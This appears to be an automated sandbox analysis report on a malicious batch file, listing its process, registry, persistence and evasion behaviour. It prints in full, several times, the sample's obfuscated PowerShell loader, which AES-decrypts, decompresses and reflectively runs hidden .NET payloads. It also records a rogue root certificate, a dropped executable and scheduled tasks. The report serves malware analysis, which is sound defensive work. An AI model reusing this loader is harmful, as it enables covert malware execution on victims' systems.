Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\spoolsv.exeSection loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: NhoqAfkhHL.batStatic file information: File size 7301955 > 1048576
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ~1.PDB @ source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: qVrKPA.exe.28.drStatic PE information: 0xA8D14247 [Thu Oct 2 02:11:19 2059 UTC]
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E858981E3C LoadLibraryA,GetProcAddress,SleepEx,8_2_000001E858981E3C
Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001E85896A7DD push rcx; retf 003Fh8_3_000001E85896A7DE
Source: C:\Windows\System32\lsass.exeCode function: 9_3_00000140ADFDA7DD push rcx; retf 003Fh9_3_00000140ADFDA7DE
Source: C:\Windows\System32\svchost.exeCode function: 12_3_00000195DD5AA7DD push rcx; retf 003Fh12_3_00000195DD5AA7DE
Source: C:\Windows\System32\cmd.exeCode function: 13_3_00000192913CA7DD push rcx; retf 003Fh13_3_00000192913CA7DE
Source: C:\Windows\System32\conhost.exeCode function: 14_3_00000139F96BA7DD push rcx; retf 003Fh14_3_00000139F96BA7DE
Source: C:\Windows\System32\dwm.exeCode function: 15_3_000001160CD4A7DD push rcx; retf 003Fh15_3_000001160CD4A7DE
Source: C:\Windows\System32\dwm.exeCode function: 15_3_000001160CB7A7DD push rcx; retf 003Fh15_3_000001160CB7A7DE
Source: C:\Windows\System32\svchost.exeCode function: 19_3_00000257E108A7DD push rcx; retf 003Fh19_3_00000257E108A7DE
Source: C:\Windows\System32\svchost.exeCode function: 20_3_000001428DCEA7DD push rcx; retf 003Fh20_3_000001428DCEA7DE
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001F28C1EA7DD push rcx; retf 003Fh21_3_000001F28C1EA7DE
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000001CA97FEA7DD push rcx; retf 003Fh22_3_000001CA97FEA7DE
Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001D2652FA7DD push rcx; retf 003Fh23_3_000001D2652FA7DE
Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000254A27DA7DD push rcx; retf 003Fh24_3_00000254A27DA7DE
Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000024B87DBA7DD push rcx; retf 003Fh25_3_0000024B87DBA7DE
Source: C:\Windows\System32\svchost.exeCode function: 26_3_00000205FB3DA7DD push rcx; retf 003Fh26_3_00000205FB3DA7DE
Source: C:\Windows\System32\svchost.exeCode function: 29_3_000001A20568A7DD push rcx; retf 003Fh29_3_000001A20568A7DE
Source: C:\Windows\System32\svchost.exeCode function: 30_3_0000018EC1F4A7DD push rcx; retf 003Fh30_3_0000018EC1F4A7DE
Source: C:\Windows\System32\svchost.exeCode function: 31_3_0000025CE3BDA7DD push rcx; retf 003Fh31_3_0000025CE3BDA7DE

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\qVrKPA.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\qVrKPA.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-gykiBRcPJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
